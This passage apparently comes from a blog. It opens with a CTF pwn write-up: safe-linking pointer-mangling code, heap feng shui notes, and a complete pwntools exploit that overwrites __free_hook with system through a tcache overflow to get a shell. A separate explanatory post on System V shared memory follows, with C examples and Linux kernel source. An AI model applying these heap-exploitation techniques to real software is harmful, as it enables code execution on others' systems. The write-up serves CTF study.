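    """Safe-linking: the value stored in fd, given the address pos of the fd field."""
    return (pos >> 12) ^ ptr

def reveal_ptr(pos: int, mangled: int) -> int:
    """Inverse operation performed by malloc when it follows the fd pointer."""
    return (pos >> 12) ^ mangled

heap_base = 0x55bd79c24000            # hypothetical leaked heap base
fd_field = heap_base + 0x8e0          # hypothetical address of the freed chunk's fd
target = 0x7f282fcac400               # hypothetical 16-byte aligned target address
forged = protect_ptr(fd_field, target)
print(hex(forged), hex(reveal_ptr(fd_field, forged)))
```

Because only the bits above the page offset take part, any address inside the same 4 KiB page gives the same key, which is why the exploit below can use (heap_base + 0x10) >> 12 instead of the exact chunk address.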

My first idea was fairly simple:

add_worker("a"*0xa0,"a"*0xa0) # chunk0 (used to leak heap_base)
add_worker(p32(0x11111111),p32(0x11111111)) # chunk1
add_worker(p32(0x22222222),p32(0x22222222)) # chunk2
add_worker(p32(0x33333333),p32(0x33333333)) # chunk3
del_worker(1)
edit_worker(0,p32(0x22222222),payload)

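Free chunk2
Edit chunk1 and use the heap overflow to modify chunk2->fd

In practice, however, this overwrites chunks that the program itself has allocated and makes it crash, so heap feng shui is needed to make the overflowable chunk_target adjacent to the freed chunk_free

After many attempts, the allocation pattern of the program turned out to be:

It first allocates 4 chunks and then frees the first 2 of them in order
The following test case confirms this: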


add_worker("a"*0xa0,"a"*0xa0)
add_worker("b"*0xa0,"b"*0xa0)
add_worker("c"*0xa0,"c"*0xa0)

0xb0 [  4]: 0x55a9811028e0 —▸ 0x55a981102830 —▸ 0x55a981102660 —▸ 0x55a981102780 ◂— 0x0 
0xb0 [  2]: 0x559a4cbd5830 —▸ 0x559a4cbd58e0 ◂— 0x0 
0xb0 [  2]: 0x55a31a9108e0 —▸ 0x55a31a910830 ◂— 0x0
0xb0 [  2]: 0x5557bbb0f830 —▸ 0x5557bbb0f8e0 ◂— 0x0

Following this pattern, first check the heap layout around 8d0, 820, 650 and 770:

Free chunk (tcache) | PREV_INUSE
Addr: 0x55916ba96770 /* chunk0:desc */
Size: 0xb1
fd: 0x55916ba96

Free chunk (tcache) | PREV_INUSE
Addr: 0x55916ba96820 /* never handed out again */
Size: 0xb1
fd: 0x559432bfdcf6

Free chunk (tcache) | PREV_INUSE
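Addr: 0x55916ba968d0 /* never handed out again */
Size: 0xb1
fd: 0x559432bfd2a6

There are 3 consecutive chunks of the same size, which is ideal for an overflow
The attack test case is as follows:

add_worker("a"*0xa0,"a"*0xa0) # used to obtain heap_base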

add_worker(p32(0x11111111),p32(0x11111111))
add_worker(p32(0x11111111),p32(0x11111111))
add_worker(p32(0x11111111),p32(0x11111111))
add_worker(p32(0x11111111),p32(0x11111111))

add_worker("a"*0xa0,"a"*0xa0)
del_worker(0) # produces 3 consecutive free chunks of the same size
add_worker("a"*0xa0,"a"*0xa0) # allocates 4 chunks and frees 2 of them
target_addr = ((heap_base + 0x10) >> 12) ^ (free_hook - 0xa8)
payload = 'B' * 0xb0 + p64(target_addr)[:6]
edit_worker(0,p32(0x11111111),payload)

tcachebins
0x20 [  5]: 0x55bd79c24ec0 —▸ 0x55bd79c250a0 —▸ 0x55bd79c24ee0 —▸ 0x55bd79c25030 —▸ 0x55bd79c24c40 ◂— 0x0
0x50 [  4]: 0x55bd79c24710 —▸ 0x55bd79c25050 —▸ 0x55bd79c24e20 —▸ 0x55bd79c24e70 ◂— 0x0
0xb0 [  2]: 0x55bd79c24830 —▸ 0x7f282fcac400 (__timer_compat_list+1984) ◂— 0x7f282fcac
0xc0 [  1]: 0x55bd79c250c0 ◂— 0x0
0x100 [  1]: 0x55bd79c24f30 ◂— 0x0
0x170 [  1]: 0x55bd79c24430 ◂— 0x0

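The target is now in tcachebins, but it cannot be taken out and stored in list directly (the first two chunks of every allocation round are freed again in order and never end up in list)
The fix is simple: free two more chunks with del_worker first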

del_worker(5)
add_worker("d"*0xa0,"d"*0xa0)
payload = 'c'*0xA8 + p64(system_libc)[:6]
edit_worker(5,p32(0x11111111),payload) # free_hook is now hijacked

tcachebins
0x20 [  3]: 0x55ac097510a0 —▸ 0x55ac09751030 —▸ 0x55ac09750c40 ◂— 0x0
0x30 [  1]: 0x55ac097511b0 ◂— 0x0
0x50 [  2]: 0x55ac09750e20 —▸ 0x55ac09750e70 ◂— 0x0
0xb0 [  4]: 0x55ac09750d10 —▸ 0x55ac09750c60 —▸ 0x55ac09750830 —▸ 0x7fefc0c74400 (__timer_compat_list+1984) ◂— 0x7fefc0c74
0xc0 [  1]: 0x55ac097510c0 ◂— 0x0
0x100 [  1]: 0x55ac09750f30 ◂— 0x0
0x170 [  1]: 0x55ac09750430 ◂— 0x0

Finally, trigger exit_s and the job is done

Full exp:

# -*- coding: utf-8 -*-
from pwn import *
import json

p = process("./pwn")

elf = ELF("./pwn")
libc = ELF("./libc.so.6")

d = "b*$rebase(0x6B6C)\n"
#gdb.attach(p,d)

def login():
    size_protocol = "\x00" + "\x00" + "\x27"
    cmd = size_protocol + "\x01" + "\x05" 
    cmd = cmd.ljust(9,"\x00")
    p.send(cmd)

    size_url = "\x00" + "\x00" + "\x00" + "\x20"
    ops_cmd = "/login?"
    name = "username=" + "111"
    pwd = "&password=" + "222"
    url = ops_cmd + name + pwd
    protocol = "\x82" + "\x86" + "\x44" + size_url + url
    print(hex(len(protocol)))
    print(hex(len(url)))
    p.send(protocol)

def register():
    size_protocol = "\x00" + "\x00" + "\x2e"
    cmd = size_protocol + "\x01" + "\x05" 
    cmd = cmd.ljust(9,"\x00")
    p.send(cmd)
 
    size_url = "\x00" + "\x00" + "\x00" + "\x27"
    ops_cmd = "/register?"
    name = "username=" + "/bin/sh"
    pwd = "&password=" + "444"
    url = ops_cmd + name + pwd
    protocol = "\x82" + "\x86" + "\x44" + size_url + url
    print(hex(len(protocol)))
    print(hex(len(url)))
    p.send(protocol)

def exit():
    size_protocol = "\x00" + "\x00" + "\x0c"
    cmd = size_protocol + "\x01" + "\x05" 
    cmd = cmd.ljust(9,"\x00")
    p.send(cmd)

    size_url = "\x00" + "\x00" + "\x00" + "\x05"
    ops_cmd = "/exit"
    url = ops_cmd 
    protocol = "\x82" + "\x86" + "\x44" + size_url + url
    print(hex(len(protocol)))
    print(hex(len(url)))
    p.send(protocol)

def add_worker(name,desc):
    size_protocol = "\x00" + "\x00" + "\x16"
    cmd = size_protocol + "\x01" + "\x05" 
    cmd = cmd.ljust(9,"\x00")
    p.send(cmd)

    size_url = "\x00" + "\x00" + "\x00" + "\x0f"
    url = "/api/add_worker"
    protocol = "\x83" + "\x86" + "\x44" + size_url + url
    print(hex(len(protocol)))
    print(hex(len(url)))
    p.send(protocol)

    strs = '{"name": "' + name + '","desc": "' + desc + '"}'
    size_strs = "\x00" + p16(len(strs))[::-1]
    cmd2 = size_strs + "\x00"
    cmd2 = cmd2.ljust(9,"\x00")
    p.send(cmd2)
    p.send(strs)

def del_worker(index):
    size_protocol = "\x00" + "\x00" + "\x16"
    cmd = size_protocol + "\x01" + "\x05" 
    cmd = cmd.ljust(9,"\x00")
    p.send(cmd)

    size_url = "\x00" + "\x00" + "\x00" + "\x0f"
    url = "/api/del_worker"
    protocol = "\x83" + "\x86" + "\x44" + size_url + url
    print(hex(len(protocol)))
    print(hex(len(url)))
    p.send(protocol)

    strs = {
        'worker_idx':index,
    }
    size_strs = "\x00" + p16(len(json.dumps(strs)))[::-1]
    cmd2 = size_strs + "\x00"
    cmd2 = cmd2.ljust(9,"\x00")
    p.send(cmd2)
    p.send(json.dumps(strs))

def show_worker(index):
    size_protocol = "\x00" + "\x00" + "\x17"
    cmd = size_protocol + "\x01" + "\x05" 
    cmd = cmd.ljust(9,"\x00")
    p.send(cmd)

    size_url = "\x00" + "\x00" + "\x00" + "\x10"
    url = "/api/show_worker"
    protocol = "\x83" + "\x86" + "\x44" + size_url + url
    print(hex(len(protocol)))
    print(hex(len(url)))
    p.send(protocol)

    strs = {
        'worker_idx':index,
    }
    size_strs = "\x00" + p16(len(json.dumps(strs)))[::-1]
    cmd2 = size_strs + "\x00"
    cmd2 = cmd2.ljust(9,"\x00")
    p.send(cmd2)
    p.send(json.dumps(strs))

def edit_worker(index,name,desc):
    size_protocol = "\x00" + "\x00" + "\x17"
    cmd = size_protocol + "\x01" + "\x05" 
    cmd = cmd.ljust(9,"\x00")
    p.send(cmd)

    size_url = "\x00" + "\x00" + "\x00" + "\x10"
    url = "/api/edit_worker"
    protocol = "\x83" + "\x86" + "\x44" + size_url + url
    print(hex(len(protocol)))
    print(hex(len(url)))
    p.send(protocol)

    strs = '{"worker_idx": ' + str(index) + ',"name": "' + name + '","desc": "' + desc + '"}'
    size_strs = "\x00" + p16(len(strs))[::-1]
    cmd2 = size_strs + "\x00"
    cmd2 = cmd2.ljust(9,"\x00")
    p.send(cmd2)
    p.send(strs)

register()
login()
p.recvuntil("gift': \"")
leak_addr = int(p.recvuntil("\"")[:-1], 16)  # %p prints a 0x-prefixed hex address
libc_base = leak_addr - 0xc4200
system_libc = libc_base + libc.sym["system"]
free_hook = libc_base + libc.sym["__free_hook"]

success("leak_addr >> " + hex(leak_addr))
success("libc_base >> " + hex(libc_base))
success("system_libc >> " + hex(system_libc))
success("free_hook >> " + hex(free_hook))

add_worker("a"*0xa0,"a"*0xa0)

p.recvuntil("name_addr\": \"")
leak_addr = eval(p.recvuntil("\"")[:-1])
heap_base = leak_addr - 0x600
success("leak_addr >> " + hex(leak_addr))
success("heap_base >> " + hex(heap_base))

add_worker(p32(0x11111111),p32(0x11111111))
add_worker(p32(0x11111111),p32(0x11111111))
add_worker(p32(0x11111111),p32(0x11111111))
add_worker(p32(0x11111111),p32(0x11111111))

add_worker("a"*0xa0,"a"*0xa0)
del_worker(0)
add_worker("a"*0xa0,"a"*0xa0)
target_addr = ((heap_base + 0x10) >> 12) ^ (free_hook - 0xa8)
payload = 'b'*0xb0 + p64(target_addr)[:6]
edit_worker(0,p32(0x11111111),payload)
del_worker(5)
add_worker("d"*0xa0,"d"*0xa0)
payload = 'c'*0xA8 + p64(system_libc)[:6]
edit_worker(5,p32(0x11111111),payload)

exit()

p.interactive()

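Summary:

This challenge is mostly about reversing. I slacked off during the competition and did not solve it, but reproducing it afterwards was fairly easy

My approach differs somewhat from the official write-up: as soon as I saw the 3 consecutive free chunks I went straight to thinking about the overflow, and in hindsight the official write-up's heap feng shui looks a little redundant

It is best not to overflow across chunks. My first idea required exactly that; to get rid of the crash I had to find its cause and forge the corresponding data, and in the end I had to give up because the payload became too long
Next time, the allocation pattern should be worked out first (by reversing or simply by experiment), and only then should adjacent chunks be arranged for the overflow

Principles: how shm shared memory works under the hood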

Posted on 2022-09-22 Edited on 2022-11-16 In Principles 23k 21 mins.

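Shared memory basics

There are two kinds of shared memory: one based on mmap, the other System V shm

Because the combined virtual address space of all user processes is far larger than the available physical memory, only the most frequently used parts are backed by physical page frames (this is not a problem, since most programs use only a small part of the memory actually available)

When data on disk is mapped into the virtual address space of a process, the kernel has to provide data structures that associate regions of the virtual address space with the location of the underlying data; Linux does this with its multi-level page table mapping mechanism
Shared memory lets several processes access the same region of memory (saving memory), and each process immediately sees updates made by the others (because several processes can operate on it at once, synchronization is required, usually with semaphores)

This article focuses on shm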

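Shared memory API

int shmget(key_t key, size_t size, int shmflg); /* obtain a shared memory segment */

key:
- IPC_PRIVATE ("0"): a new shared memory object is created
- A 32-bit integer greater than 0: the operation depends on shmflg (this value normally comes from the IPC key returned by ftok)
size:
- "0": pass "0" when only looking up an existing segment
- An integer greater than 0: size of the new segment, in bytes
shmflg:
- "0": look up the identifier of the segment; the call fails if it does not exist
- IPC_CREAT: if no segment with this key exists in the kernel, create one; if one exists, return its identifier
- IPC_CREAT | IPC_EXCL: if no segment with this key exists in the kernel, create one; if one exists, fail
return:
- Success: returns the identifier of the shared memory segment
- Failure: returns "-1" and stores the cause in errno

void *shmat(int shmid, const void *shmaddr, int shmflg); /* map the segment into memory */

shmid:
- Identifier of the shared memory segment
shmaddr:
- If shmaddr is "0", the segment is attached at the first available address chosen by the kernel
- If shmaddr is non-zero and SHM_RND is not specified, the segment is attached at shmaddr, which must be a page-aligned address
- If shmaddr is non-zero and SHM_RND is specified, the system aligns shmaddr automatically
shmflg:
- "0": read-write mode
- SHM_RDONLY: read-only mode
- SHM_EXEC: request execute permission on the segment (for shared memory, execute permission is effectively the same as read permission)
- SHM_RND: round the address down to the nearest SHMLBA boundary (only meaningful when shmaddr is non-NULL)
- SHM_REMAP: the attached segment replaces any existing mapping in that address range
return:
- Success: returns the address of the attached segment
- Failure: returns "-1" and stores the cause in errno
PS:
- After fork, the child inherits the attached shared memory segments
- After exec, the attached shared memory segments are detached automatically
- When the process exits, the attached shared memory segments are detached automatically

int shmdt(const void *shmaddr); /* remove the memory mapping */

shmaddr:
- Start address of the attached shared memory segment
return:
- Success: returns "0"
- Failure: returns "-1" and stores the cause in errno

int shmctl(int shmid, int cmd, struct shmid_ds *buf); /* control operations on a shared memory segment */

shmid:
- Identifier of the shared memory segment
cmd:
- IPC_STAT: query the state of the segment by copying its shmid_ds structure into buf
- IPC_SET: change the state of the segment by copying uid, gid and mode from the shmid_ds structure pointed to by buf into the segment's shmid_ds structure
- IPC_RMID: delete the segment (destroy the shmid created by shmget)
buf:
- Management structure of the shared memory segment
return:
- Success: returns "0"
- Failure: returns "-1" and stores the cause in errno

Shared memory usage example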

共享内存使用案例

Writing to shm:

#include <stdio.h>
#include <sys/shm.h>
#include <unistd.h>
#include <string.h>

int main(int argc, char **argv) {
    int shmid;
    int i = 0;
    char *pshm;
    char buf[1024];
    key_t key = ftok(".",'z');

    printf("key = 0x%x\n",key);
    shmid = shmget(key, 1024 * 10, 0666 | IPC_CREAT);
    pshm = shmat(shmid, 0, 0);

    printf("input node 0-9\n");
    scanf("%d", &i);
    printf("node is %d\n", i);

    memset(buf, 0, sizeof(buf));
    printf("input data\n");
    scanf("%1023s", buf); /* bound the read so that buf cannot overflow */
    memcpy(pshm + i * 1024, buf, 1024);
    shmdt(pshm);
    return 0;
}

Reading from shm:

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/shm.h>

int main(int argc, char **argv) {
    int i;
    char *pshm;
    char buf[1024];
    int shmid;
    key_t key = ftok(".",'z');
    
    printf("key = 0x%x\n",key);
    shmid = shmget(key, 1024 * 10, 0666 | IPC_CREAT);
    pshm = shmat(shmid, 0, 0);

    printf("input node 0-9\n");
    scanf("%d", &i);
    printf("node is %d\n",i);

    memset(buf, 0, 1024);
    memcpy(buf, pshm + i * 1024, 1024);
    fprintf(stderr,"data [%s]\n", buf);
    shmdt(pshm);
    return 0;
}

Result: (reading and writing are split into two programs here to show that this is inter-process communication)

➜  exp ./send
key = 0x7a05274f
input node 0-9
0
node is 0
input data
yhellow

➜  exp ./read
key = 0x7a05274f
input node 0-9
0
node is 0
data [yhellow]
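
The key printed by both programs can be explained from the way glibc implements ftok: it combines the low 16 bits of the inode number of the path, the low 8 bits of its device number and the low 8 bits of the project id. The sketch below models that formula; POSIX does not mandate it, and the inode and device values are simply read back out of the printed key 0x7a05274f rather than taken from the original system.

```python
def ftok_key(st_ino: int, st_dev: int, proj_id: int) -> int:
    """glibc-style ftok: low 16 bits of inode | low 8 bits of device | low 8 bits of proj_id."""
    return (st_ino & 0xffff) | ((st_dev & 0xff) << 16) | ((proj_id & 0xff) << 24)

# Assumed values: inode ending in 0x274f and device ending in 0x05 are inferred from the output above.
key = ftok_key(0x274f, 0x05, ord("z"))
print(hex(key))
```

This also shows why the sender and the reader agree on the key: both call ftok(".", 'z') from the same directory, so they see the same inode and device.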

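On the surface this looks a lot like msg:
- "shared memory segment (shmid_kernel)" corresponds to "message queue (msg_queue)"
- "mapped memory (shm_file_data)" corresponds to "message (msg_msg)"
- The difference is that an extra region appears in the virtual address space: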

    0x7ffff7fb0000     0x7ffff7fb6000 rw-p     6000 0      [anon_7ffff7fb0]
    0x7ffff7fc6000     0x7ffff7fc9000 rw-p     3000 0      /SYSV7a05274f (deleted)
    0x7ffff7fc9000     0x7ffff7fcd000 r--p     4000 0      [vvar]
    0x7ffff7fcd000     0x7ffff7fcf000 r-xp     2000 0      [vdso]
pwndbg> telescope 0x7ffff7fc6000
00:0000│  0x7ffff7fc6000 ◂— 0x776f6c6c656879 /* 'yhellow' */
01:0008│  0x7ffff7fc6008 ◂— 0x0

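Parent-child communication through shm:

#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/wait.h> /* waitpid */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h> /* fork, sleep */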

#define BUFFER_SIZE 2048

int main()
{
	pid_t pid;
	int shmid;
	char *shm_addr;
	char flag[] = "WROTE";
	char buff[2048];
	
	system("ipcs -m");
	if ((shmid = shmget(IPC_PRIVATE, BUFFER_SIZE, 0666)) < 0){
		perror("shmget");
		exit(1);
	}
	else{
		printf("Create shared-memory: %d\n",shmid);
	}
	system("ipcs -m");
	
	pid = fork();
	if (pid == -1){
		perror("fork");
		exit(1);
	}
	else if (pid == 0) { /* child process */
		if ((shm_addr = shmat(shmid, 0, 0)) == (void*)-1){
			perror("Child: shmat");
			exit(1);
		}
		else{
			printf("Child: Attach shared-memory addr: %p\n", shm_addr);
		}
		system("ipcs -m");
		
		while (strncmp(shm_addr, flag, strlen(flag))){
			printf("Child: Wait for enable data...\n");
			sleep(5);
		}

		strcpy(buff, shm_addr + strlen(flag));
		printf("Child: Shared-memory :%s\n", buff);

		if ((shmdt(shm_addr)) < 0){
			perror("shmdt");
			exit(1);
		}
		else{
			printf("Child: Deattach shared-memory\n");
		}
	  	system("ipcs -m");
	  	
	  	if (shmctl(shmid, IPC_RMID, NULL) == -1){
			perror("Child: shmctl(IPC_RMID)\n");
			exit(1);
		}
		else{
			printf("Delete shared-memory\n");
		}
		system("ipcs -m");
	}
	else { /* parent process */
		sleep(1);
		if ((shm_addr = shmat(shmid, 0, 0)) == (void*)-1){
			perror("Parent: shmat");
			exit(1);
		}
		else{
			printf("Parent: Attach shared-memory addr: %p\n", shm_addr);
		}
		
		printf("\nInput some string:(Parent)\n");
		fgets(buff, BUFFER_SIZE - sizeof(flag), stdin); /* leave room for the flag prefix inside the segment */
		strncpy(shm_addr + strlen(flag), buff, strlen(buff));
		strncpy(shm_addr, flag, strlen(flag));
		system("ipcs -m");

		if ((shmdt(shm_addr)) < 0){
			perror("Parent: shmdt");
			exit(1);
		}
		else{
			printf("Parent: Deattach shared-memory\n");
		}
		system("ipcs -m");
		
		waitpid(pid, NULL, 0);		
		printf("Finished\n");
	}
  	exit(0);
}

Result:

➜  exp ./shmem

------------ Shared Memory Segments -------------- /* initial state */
key        shmid      owner      perms      bytes      nattch     status
0x00000000 4          yhellow    600        524288     2          dest
0x00000000 7          yhellow    600        524288     2          dest
0x00000000 11         yhellow    600        524288     2          dest

Create shared-memory: 13

------------ Shared Memory Segments -------------- /* the new segment created by shmget (shmid == 13) */
key        shmid      owner      perms      bytes      nattch     status
0x00000000 4          yhellow    600        524288     2          dest
0x00000000 7          yhellow    600        524288     2          dest
0x00000000 11         yhellow    600        524288     2          dest
0x00000000 13         yhellow    666        2048       0

Child: Attach shared-memory addr: 0x7fe24a52d000

------------ Shared Memory Segments -------------- /* the child attaches the segment, so nattch goes up by one */
key        shmid      owner      perms      bytes      nattch     status
0x00000000 4          yhellow    600        524288     2          dest
0x00000000 7          yhellow    600        524288     2          dest
0x00000000 11         yhellow    600        524288     2          dest
0x00000000 13         yhellow    666        2048       1

Child: Wait for enable data...
Parent: Attach shared-memory addr: 0x7fe24a52d000

Input some string:(Parent)
yhellow /* typed into the parent process */

------------ Shared Memory Segments -------------- /* the parent attaches the segment, so nattch goes up by one */
key        shmid      owner      perms      bytes      nattch     status
0x00000000 4          yhellow    600        524288     2          dest
0x00000000 7          yhellow    600        524288     2          dest
0x00000000 11         yhellow    600        524288     2          dest
0x00000000 13         yhellow    666        2048       2

Parent: Deattach shared-memory

------------ Shared Memory Segments -------------- /* the parent detaches the segment, so nattch goes down by one */
key        shmid      owner      perms      bytes      nattch     status
0x00000000 4          yhellow    600        524288     2          dest
0x00000000 7          yhellow    600        524288     2          dest
0x00000000 11         yhellow    600        524288     2          dest
0x00000000 13         yhellow    666        2048       1

Child: Shared-memory :yhellow /* printed by the child process */

Child: Deattach shared-memory

------------ Shared Memory Segments -------------- /* the child detaches the segment, so nattch goes down by one */
key        shmid      owner      perms      bytes      nattch     status
0x00000000 4          yhellow    600        524288     2          dest
0x00000000 7          yhellow    600        524288     2          dest
0x00000000 11         yhellow    600        524288     2          dest
0x00000000 13         yhellow    666        2048       0

Delete shared-memory

------------ Shared Memory Segments -------------- /* shmctl destroyed the segment */
key        shmid      owner      perms      bytes      nattch     status
0x00000000 4          yhellow    600        524288     2          dest
0x00000000 7          yhellow    600        524288     2          dest
0x00000000 11         yhellow    600        524288     2          dest

Finished
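
The attach count in the ipcs listings also explains a common idiom: a segment can be marked for removal with IPC_RMID while it is still attached, and the kernel only frees it after the last detach. The sketch below is not the program above but a shorter variant under that assumption: it attaches first, marks the segment for removal, forks, lets the child write, and reads the data back in the parent after waitpid. The function name shm_roundtrip and the constant SEG_SIZE are hypothetical.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/wait.h>

#define SEG_SIZE 2048   /* hypothetical segment size */

/* Send msg from a child to the parent through a System V segment.
 * Returns 0 and fills out on success, -1 on any failure. */
int shm_roundtrip(const char *msg, char *out, size_t outlen)
{
    int shmid, status;
    char *addr;
    pid_t pid;

    shmid = shmget(IPC_PRIVATE, SEG_SIZE, IPC_CREAT | 0600);
    if (shmid < 0)
        return -1;

    addr = shmat(shmid, NULL, 0);
    /* Mark the segment for removal right away: it stays usable while
     * attached and is freed by the kernel after the last detach. */
    shmctl(shmid, IPC_RMID, NULL);
    if (addr == (void *)-1)
        return -1;

    pid = fork();                       /* the attachment is inherited */
    if (pid < 0) {
        shmdt(addr);
        return -1;
    }
    if (pid == 0) {                     /* child: write and leave */
        snprintf(addr, SEG_SIZE, "%s", msg);
        _exit(0);
    }

    /* parent: waiting for the child replaces the polling loop */
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status) ||
        WEXITSTATUS(status) != 0) {
        shmdt(addr);
        return -1;
    }
    snprintf(out, outlen, "%s", addr);
    shmdt(addr);                        /* last detach: segment is freed */
    return 0;
}
```

Calling shm_roundtrip("yhellow", out, sizeof(out)) should leave the string in out without any segment surviving in ipcs -m afterwards. Waiting on the child is a deliberate simplification; unrelated processes would still need a flag or a semaphore as in the original program.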

How shm is implemented in Linux

► 0x7ffff7ee11fc <shmget+12>       syscall  <SYS_shmget>
       key: 0x7a05274f
       size: 0x2800
       shmflg: 0x3b6

struct ipc_ops {
	int (*getnew)(struct ipc_namespace *, struct ipc_params *);
	int (*associate)(struct kern_ipc_perm *, int);
	int (*more_checks)(struct kern_ipc_perm *, struct ipc_params *);
};

long ksys_shmget(key_t key, size_t size, int shmflg)
{
	struct ipc_namespace *ns;
	static const struct ipc_ops shm_ops = {
		.getnew = newseg,
		.associate = security_shm_associate,
		.more_checks = shm_more_checks,
	}; /* initialize the "creation routines" (the ipc_ops table) */
	struct ipc_params shm_params;

	ns = current->nsproxy->ipc_ns; /* get the current IPC namespace */

	shm_params.key = key; /* key */
	shm_params.flg = shmflg; /* flags */
	shm_params.u.size = size; /* size */

	return ipcget(ns, &shm_ids(ns), &shm_ops, &shm_params); /* core function */
}

int ipcget(struct ipc_namespace *ns, struct ipc_ids *ids,
			const struct ipc_ops *ops, struct ipc_params *params)
{
	if (params->key == IPC_PRIVATE) /* private key? */
		return ipcget_new(ns, ids, ops, params); /* always create a new IPC object */
	else
		return ipcget_public(ns, ids, ops, params); /* look up an existing IPC object, or create a new one */
}

static int ipcget_public(struct ipc_namespace *ns, struct ipc_ids *ids,
		const struct ipc_ops *ops, struct ipc_params *params)
{
    // *ns: IPC namespace
    // *ids: set of IPC identifiers
    // *ops: the actual creation routines to call
    // *params: their parameters
	struct kern_ipc_perm *ipcp;
	int flg = params->flg;
	int err;

	/*
	 * Take the lock as a writer since we are potentially going to add
	 * a new entry + read locks are not "upgradable"
	 */
	down_write(&ids->rwsem);
	ipcp = ipc_findkey(ids, params->key); /* look up an existing object by key */
	if (ipcp == NULL) {
		if (!(flg & IPC_CREAT)) /* without IPC_CREAT, a missing key is an error */
			err = -ENOENT;
		else
			err = ops->getnew(ns, params); /* IPC_CREAT: no object with this key exists, so create one */
	} else {
		if (flg & IPC_CREAT && flg & IPC_EXCL) /* IPC_CREAT|IPC_EXCL: fail if an object with this key already exists */
			err = -EEXIST;
		else {
			err = 0;
			if (ops->more_checks)
				err = ops->more_checks(ipcp, params);
			if (!err)
				/* ipc_check_perms returns the IPC id on success */
				err = ipc_check_perms(ns, ipcp, ops, params); 
		}
		ipc_unlock(ipcp);
	}
	up_write(&ids->rwsem);

	return err;
}

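Everything up to this point is common to shared memory, semaphores and message queues; only the initialization of the ipc_ops structure differs.
This is essentially object-oriented design: a set of functions and data structures describes the IPC "class" (C simply has no way to declare it as one).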
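
To make the ops-table dispatch concrete, here is a user-space toy model of the ipcget logic. It is only a sketch: every name starting with toy_ or TOY_ is hypothetical, locking and permission checks are left out, and the "segments" are just entries in a small array. What it keeps is the decision tree around IPC_PRIVATE, IPC_CREAT and IPC_EXCL and the size check that shm_more_checks performs.

```c
#include <errno.h>
#include <stddef.h>

#define TOY_PRIVATE 0       /* plays the role of IPC_PRIVATE */
#define TOY_CREAT   01000   /* plays the role of IPC_CREAT */
#define TOY_EXCL    02000   /* plays the role of IPC_EXCL */
#define TOY_MAX     16      /* capacity of the toy id table */

struct toy_params { int key; int flg; size_t size; };

/* The "virtual methods": each IPC flavour would supply its own table. */
struct toy_ops {
    int (*getnew)(const struct toy_params *);
    int (*more_checks)(int id, const struct toy_params *);
};

struct toy_obj { int used; int key; size_t size; };
static struct toy_obj toy_table[TOY_MAX];

static int toy_findkey(int key)
{
    for (int i = 0; i < TOY_MAX; i++)
        if (toy_table[i].used && toy_table[i].key == key)
            return i;
    return -1;
}

/* Stand-in for newseg: claim a free slot and return its id. */
static int toy_newseg(const struct toy_params *p)
{
    for (int i = 0; i < TOY_MAX; i++) {
        if (!toy_table[i].used) {
            toy_table[i].used = 1;
            toy_table[i].key = p->key;
            toy_table[i].size = p->size;
            return i;
        }
    }
    return -ENOSPC;
}

/* Stand-in for shm_more_checks: the caller may not ask for more
 * bytes than the existing segment has. */
static int toy_shm_more_checks(int id, const struct toy_params *p)
{
    return p->size > toy_table[id].size ? -EINVAL : 0;
}

const struct toy_ops toy_shm_ops = {
    .getnew = toy_newseg,
    .more_checks = toy_shm_more_checks,
};

/* Returns an id (>= 0) or a negative errno value. */
int toy_ipcget(const struct toy_ops *ops, const struct toy_params *p)
{
    int id, err;

    if (p->key == TOY_PRIVATE)          /* private: always a new object */
        return ops->getnew(p);

    id = toy_findkey(p->key);
    if (id < 0)
        return (p->flg & TOY_CREAT) ? ops->getnew(p) : -ENOENT;
    if ((p->flg & TOY_CREAT) && (p->flg & TOY_EXCL))
        return -EEXIST;
    err = ops->more_checks ? ops->more_checks(id, p) : 0;
    return err ? err : id;
}
```

A message-queue or semaphore flavour would reuse toy_ipcget unchanged and only pass a different toy_ops table, which is the point the paragraph above makes.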
The source of newseg, which creates a new shared memory segment, is as follows:

static int newseg(struct ipc_namespace *ns, struct ipc_params *params)
{
    // *ns: namespace
    // *params: pointer to the ipc_params structure holding key, shmflg and size
	key_t key = params->key;
	int shmflg = params->flg;
	size_t size = params->u.size;
	int error;
	struct shmid_kernel *shp;
	size_t numpages = (size + PAGE_SIZE - 1) >> PAGE_SHIFT;
	struct file *file;
	char name[13];
	vm_flags_t acctflag = 0;

	if (size < SHMMIN || size > ns->shm_ctlmax)
		return -EINVAL;

	if (numpages << PAGE_SHIFT < size)
		return -ENOSPC;

	if (ns->shm_tot + numpages < ns->shm_tot ||
			ns->shm_tot + numpages > ns->shm_ctlall)
		return -ENOSPC;

	shp = kvmalloc(sizeof(*shp), GFP_KERNEL); /* allocate the shmid_kernel structure from kernel memory */
	if (unlikely(!shp))
		return -ENOMEM;

	shp->shm_perm.key = key; /* fill in shmid_kernel->shm_perm from the parameters */
	shp->shm_perm.mode = (shmflg & S_IRWXUGO);
	shp->mlock_user = NULL;

	shp->shm_perm.security = NULL;
	error = security_shm_alloc(&shp->shm_perm); /* LSM hook: allocate the security data for this segment (the id is assigned later, by ipc_addid) */
	if (error) {
		kvfree(shp);
		return error;
	}

	sprintf(name, "SYSV%08x", key); /* note: this name shows up in the output of GDB's "vmmap" command */
	if (shmflg & SHM_HUGETLB) { /* SHM_HUGETLB: back the segment with huge pages */
		struct hstate *hs;
		size_t hugesize;

		hs = hstate_sizelog((shmflg >> SHM_HUGE_SHIFT) & SHM_HUGE_MASK); /* look up the huge page state for the requested page size */
		if (!hs) {
			error = -EINVAL;
			goto no_file;
		}
		hugesize = ALIGN(size, huge_page_size(hs)); /* round up to the huge page size */

		/* hugetlb_file_setup applies strict accounting */
		if (shmflg & SHM_NORESERVE)
			acctflag = VM_NORESERVE;
		file = hugetlb_file_setup(name, hugesize, acctflag,
				  &shp->mlock_user, HUGETLB_SHMFS_INODE,
				(shmflg >> SHM_HUGE_SHIFT) & SHM_HUGE_MASK); /* create the backing file on hugetlbfs */
	} else {
		/*
		 * Do not allow no accounting for OVERCOMMIT_NEVER, even
		 * if it's asked for.
		 */
		if  ((shmflg & SHM_NORESERVE) &&
				sysctl_overcommit_memory != OVERCOMMIT_NEVER)
			acctflag = VM_NORESERVE;
		file = shmem_kernel_file_setup(name, size, acctflag); /* create a file in the shmem filesystem */
